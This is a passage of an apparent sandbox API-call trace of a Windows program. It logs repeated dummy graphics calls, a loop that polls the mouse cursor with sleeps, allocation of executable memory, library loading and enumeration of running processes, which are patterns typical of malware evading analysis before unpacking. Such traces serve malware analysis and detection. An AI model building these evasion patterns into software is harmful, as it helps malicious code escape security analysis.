xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.376] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.377] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0157.380] GetCursorPos (in: lpPoint=0x18ff2c | out: lpPoint=0x18ff2c*(x=860, y=449)) returned 1 [0157.380] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=860, y=449)) returned 1 [0157.380] Sleep (dwMilliseconds=0xac) [0157.561] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=860, y=449)) returned 1 [0157.561] Sleep (dwMilliseconds=0xac) [0157.748] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=860, y=449)) returned 1 [0157.748] Sleep (dwMilliseconds=0xac) [0157.955] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=215, y=475)) returned 1 [0157.955] Sleep (dwMilliseconds=0xac) [0158.152] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=215, y=475)) returned 1 [0158.152] Sleep (dwMilliseconds=0xac) [0158.325] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=215, y=475)) returned 1 [0158.325] Sleep (dwMilliseconds=0xac) [0158.513] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=215, y=475)) returned 1 [0158.513] Sleep (dwMilliseconds=0xac) [0158.700] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=215, y=475)) returned 1 [0158.700] Sleep (dwMilliseconds=0xac) [0158.912] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=215, y=475)) returned 1 [0158.912] Sleep (dwMilliseconds=0xac) [0159.090] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=215, y=475)) returned 1 [0159.090] Sleep (dwMilliseconds=0xac) [0159.277] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=215, y=475)) returned 1 [0159.277] Sleep (dwMilliseconds=0xac) [0159.464] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=215, y=475)) returned 1 [0159.464] Sleep (dwMilliseconds=0xac) [0159.708] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=215, y=475)) returned 1 [0159.708] Sleep (dwMilliseconds=0xac) [0159.885] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=215, y=475)) returned 1 [0159.886] Sleep (dwMilliseconds=0xac) [0160.073] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=215, y=475)) returned 1 [0160.079] Sleep (dwMilliseconds=0xac) [0160.260] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=215, y=475)) returned 1 [0160.260] Sleep (dwMilliseconds=0xac) [0160.619] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=215, y=475)) returned 1 [0160.619] Sleep (dwMilliseconds=0xac) [0160.806] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=215, y=475)) returned 1 [0160.806] Sleep (dwMilliseconds=0xac) [0161.001] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=430, y=475)) returned 1 [0161.001] Sleep (dwMilliseconds=0xac) [0161.180] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=430, y=475)) returned 1 [0161.180] Sleep (dwMilliseconds=0xac) [0161.367] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=430, y=475)) returned 1 [0161.367] Sleep (dwMilliseconds=0xac) [0161.554] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=430, y=475)) returned 1 [0161.554] Sleep (dwMilliseconds=0xac) [0161.742] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=430, y=475)) returned 1 [0161.742] Sleep (dwMilliseconds=0xac) [0161.929] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=430, y=475)) returned 1 [0161.929] Sleep (dwMilliseconds=0xac) [0162.116] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=430, y=475)) returned 1 [0162.116] Sleep (dwMilliseconds=0xac) [0162.304] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=430, y=475)) returned 1 [0162.304] Sleep (dwMilliseconds=0xac) [0162.580] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=430, y=475)) returned 1 [0162.580] Sleep (dwMilliseconds=0xac) [0162.760] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=430, y=475)) returned 1 [0162.760] Sleep (dwMilliseconds=0xac) [0162.943] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=430, y=475)) returned 1 [0162.943] Sleep (dwMilliseconds=0xac) [0163.140] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=430, y=475)) returned 1 [0163.140] Sleep (dwMilliseconds=0xac) [0163.317] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=430, y=475)) returned 1 [0163.317] Sleep (dwMilliseconds=0xac) [0163.504] VirtualAlloc (lpAddress=0x214000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x214000 [0163.507] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x3d0000 [0163.511] LoadLibraryA (lpLibFileName="shell32") returned 0x76b00000 [0163.512] LoadLibraryA (lpLibFileName="user32") returned 0x77820000 [0163.513] LoadLibraryA (lpLibFileName="advapi32") returned 0x76490000 [0163.524] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3e0000 [0163.525] VirtualAlloc (lpAddress=0x0, dwSize=0x8000005, flAllocationType=0x3000, flProtect=0x4) returned 0x2480000 [0164.561] VirtualFree (lpAddress=0x2480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0165.106] VirtualAlloc (lpAddress=0x0, dwSize=0x101d0, flAllocationType=0x3000, flProtect=0x4) returned 0x1cf0000 [0165.107] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc4 [0165.108] Process32FirstW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.109] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0165.109] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0165.111] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0165.111] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0165.112] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0165.112] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0165.113] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0165.113] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0165.114] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0165.114] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.115] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.115] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.116] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.116] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.117] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0165.117] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.118] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.118] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0165.119] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.119] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0165.120] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0165.120] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.121] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0165.121] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0165.122] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0165.122] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0165.123] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="easily.exe")) returned 1 [0165.123] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="stockportsconvenient.exe")) returned 1 [0165.124] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dangerous.exe")) returned 1 [0165.124] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="retained_one_psychology.exe")) returned 1 [0165.125] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x760, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pentium-southampton.exe")) returned 1 [0165.125] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="declare.exe")) returned 1 [0165.126] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="credit-albania.exe")) returned 1 [0165.126] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="celebrate.exe")) returned 1 [0165.127] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="watson_block.exe")) returned 1 [0165.127] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, 